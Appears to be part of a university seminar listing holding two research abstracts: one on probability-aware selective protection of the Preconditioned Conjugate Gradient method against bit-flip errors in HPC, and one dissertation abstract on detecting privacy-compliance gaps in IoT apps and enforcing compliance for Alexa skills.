With the increasing scale of high-performance computing (HPC) systems, transient bit-flip errors are now more likely than ever, posing a threat to long-running scientific applications. A substantial portion of these applications involve the simulation of partial differential equations (PDEs) modeling physical processes over discretized spatial and temporal domains, with some requiring the solving of sparse linear systems. While these applications are often paired with system-level application-agnostic resilience techniques such as checkpointing and replication, the utilization of these techniques imposes significant overhead. In this work, we present a probability-aware framework that produces low-overhead selective protection schemes for the widely used Preconditioned Conjugate Gradient (PCG) method, whose performance can heavily degrade due to error propagation through the sparse matrix-vector multiplication (SpMV) operation. Through the use of a straightforward mathematical model and an optimized machine learning model, our selective protection schemes incorporate error probability to protect only certain crucial operations. An experimental evaluation using 15 matrices from the SuiteSparse Matrix Collection demonstrates that our protection schemes effectively reduce resilience overheads, often outperforming or matching both baseline and established protection schemes across all error probabilities.
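One standard low-overhead way to protect an SpMV against the bit-flip errors described above is a checksum test in the spirit of algorithm-based fault tolerance (sketched here for illustration; not necessarily this paper's exact protection scheme): precompute w = A^T 1 once, then for y = A x the identity sum(y) = w . x must hold, so a single extra dot product flags a corrupted result.

```python
import numpy as np

rng = np.random.default_rng(0)
A = rng.standard_normal((6, 6))   # dense stand-in for a sparse matrix
x = rng.standard_normal(6)
w = A.T @ np.ones(6)              # one-time checksum vector

y = A @ x
ok_clean = bool(np.isclose(y.sum(), w @ x))   # clean SpMV passes the check

y[3] += 1.0                       # inject a bit-flip-like error into one entry
ok_faulty = bool(np.isclose(y.sum(), w @ x))  # corrupted SpMV fails it

print(ok_clean, ok_faulty)
```

Selective protection then amounts to applying such checks only to the SpMV invocations whose corruption is most likely to propagate, rather than to every operation in PCG.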
Javaria Ahmad
Discovering Privacy Compliance Issues in IoT Apps and Alexa Skills Using AI and Presenting a Mechanism for Enforcing Privacy Compliance
When & Where:
LEEP2, Room 2425
Committee Members:
Bo Luo, Chair
Alex Bardas
Tamzidul Hoque
Fengjun Li
Michael Zhuo Wang
Abstract
The growth of IoT and voice assistant (VA) apps poses increasing concerns about sensitive data leaks. While privacy policies are required to describe how these apps use private user data (i.e., their data practices), problems such as missing, inaccurate, and inconsistent policies have been repeatedly reported. It is therefore important to assess the actual data practices of apps and identify potential gaps between actual and declared data usage. We find that app stores do little to regulate compliance between app practices and their declarations, so we use AI to discover compliance issues in these apps, assisting both regulators and developers. For VA apps, we also develop a mechanism to enforce compliance using AI. In this work, we conduct a measurement study using our framework, IoTPrivComp, which applies automated analysis of IoT apps' code and privacy policies to identify compliance gaps. We collect 1,489 IoT apps with English privacy policies from the Play Store. IoTPrivComp detects 532 apps with sensitive external data flows, among which 408 (76.7%) apps have undisclosed data leaks. Moreover, 63.4% of the data flows that involve health and wellness data are inconsistent with the practices disclosed in the apps' privacy policies. Next, we focus on compliance issues in skills. VAs, such as Amazon Alexa, are integrated with numerous devices in homes and cars to process user requests using apps called skills. With their growing popularity, VAs also pose serious privacy concerns. Sensitive user data captured by VAs may be transmitted to third-party skills without users' consent or knowledge of how their data is processed. Privacy policies are the standard medium for informing users of the data practices performed by skills.
However, privacy policy compliance verification for such skills is challenging, since the source code is controlled by the skill developers, who can make arbitrary changes to a skill's behavior without being audited; hence, conventional defense mechanisms based on static/dynamic code analysis can be easily evaded. We present Eunomia, the first real-time privacy compliance firewall for Alexa skills. As skills interact with users, Eunomia monitors their actions by intercepting and examining the communications from the skills to the users, and validates them against the published privacy policies, which are parsed using a BERT-based policy analysis module. When non-compliant skill behaviors are detected, Eunomia stops the interaction and warns the user. We evaluate Eunomia with 55,898 skills from the Amazon skills store to demonstrate its effectiveness and to provide a privacy compliance landscape of Alexa skills.
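The core check a firewall like the one described performs can be sketched as: intercept a skill's outgoing message and flag it if it solicits a data type the parsed policy does not disclose. The real system uses a BERT-based policy analysis module; simple keyword matching stands in for it below, and all names and patterns are illustrative assumptions:

```python
# Hedged sketch of a Eunomia-style compliance check: block skill
# messages that solicit data types not disclosed in the privacy
# policy. Keyword regexes stand in for the BERT-based analysis the
# abstract describes; every pattern here is an illustrative assumption.
import re

# Data types assumed to be recognizable in skill-to-user messages.
DATA_PATTERNS = {
    "location": r"\b(address|location|where you live)\b",
    "contact":  r"\b(phone number|email)\b",
    "health":   r"\b(medication|symptom|diagnosis)\b",
}

def check_response(skill_text: str, disclosed: set) -> tuple:
    """Return (compliant, violations) for one skill-to-user message,
    given the set of data types the policy discloses."""
    violations = [
        dtype for dtype, pat in DATA_PATTERNS.items()
        if re.search(pat, skill_text, re.IGNORECASE) and dtype not in disclosed
    ]
    return (not violations, violations)

ok, bad = check_response("Please tell me your phone number.", disclosed={"location"})
print(ok, bad)  # False ['contact']
```

Because the check runs on the skill-to-user channel rather than on the skill's source code, it still works when developers silently change a skill's server-side behavior, which is the evasion problem the abstract raises.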